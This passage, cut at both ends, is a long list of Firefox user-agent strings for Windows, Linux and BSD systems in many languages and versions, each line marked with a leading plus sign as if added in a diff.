Firefox/2.0.0.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sr; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 +Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506) +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-AU; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) FirePHP/0.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 FirePHP/0.4 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729; .NET4.0C) FirePHP/0.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:2.0b10) Gecko/20110126 Firefox/4.0b10 +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0 +Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 FirePHP/0.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 +Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9 +Mozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:2.0.4) Gecko/20120718 AskTbAVR-IDW/3.12.5.17700 Firefox/14.0.1 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6 +Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0 +Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre +Mozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre +Mozilla/5.0 (Windows x86; rv:19.0) Gecko/20100101 Firefox/19.0 +Mozilla/5.0 (X11; Arch Linux i686; rv:2.0) Gecko/20110321 Firefox/4.0 +Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; FreeBSD i686) Firefox/3.6 +Mozilla/5.0 (X11; FreeBSD x86_64; rv:2.0) Gecko/20100101 Firefox/3.6.12 +Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0 +Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0 +Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0a2) Gecko/20110524 Firefox/5.0a2 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:5.0) Gecko/20100101 Firefox/3.6.17 Firefox/3.6.17 +Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0 +Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20110518 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10 +Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20100101 Firefox/4.0b12pre +Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre +Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre +Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/3.6 +Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 +Mozilla/5.0 (X11; Linux i686; U; pl; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20110506 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5 +Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 +Mozilla/5.0 (X11; Mageia; Linux x86_64; rv:10.0.9) Gecko/20100101 Firefox/10.0.9 +Mozilla/5.0 (X11; NetBSD amd64; rv:16.0) Gecko/20121102 Firefox/16.0 +Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0 +Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0 +Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1 +Mozilla/5.0 (X11; U; FreeBSD amd64; en-US; rv:1.8.0.8) Gecko/20061116 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.12) Gecko/20051105 Firefox/1.0.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.5) Gecko/20041114 Firefox/1.0 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.3 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20060303 Firefox/1.0.3 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.2) Gecko/20060414 Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.8) Gecko/20061210 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.20) Gecko/20090225 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.20) Gecko/20090413 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9a2) Gecko/20080530 Firefox/3.0a2 +Mozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8 +Mozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 +Mozilla/5.0 (X11; U; Gentoo Linux x86_64; pl-PL) Gecko Firefox +Mozilla/5.0 (X11; U; Gentoo Linux x86_64; pl-PL; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux AMD64; en-US; rv:1.9.2.3) Gecko/20100403 Ubuntu/10.10 (maverick) Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0 +Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian) +Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.6.11 +Mozilla/5.0 (X11; U; Linux; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11 +Mozilla/5.0 (X11; U; Linux; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux Gentoo i686; pl; rv:1.8.0.8) Gecko/20061219 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux Gentoo; pl-PL; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; U; Linux i686; bg; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.8.0.10) Gecko/20070313 Fedora/1.5.0.10-5.fc6 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11 +Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.0.16) Gecko/2009121601 Ubuntu/9.04 (jaunty) Firefox/3.0.16 +Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux i686; da-DK; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2 +Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4) +Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.6) Gecko/20050325 Firefox/1.0.2 (Debian package 1.0.2-1) +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.6) Gecko/20040207 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.13) Gecko/20060411 Firefox/1.0.8 SUSE/1.0.8-0.2 +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 (Ubuntu package 1.0.8) +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1.0 +Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.6) Gecko/20050306 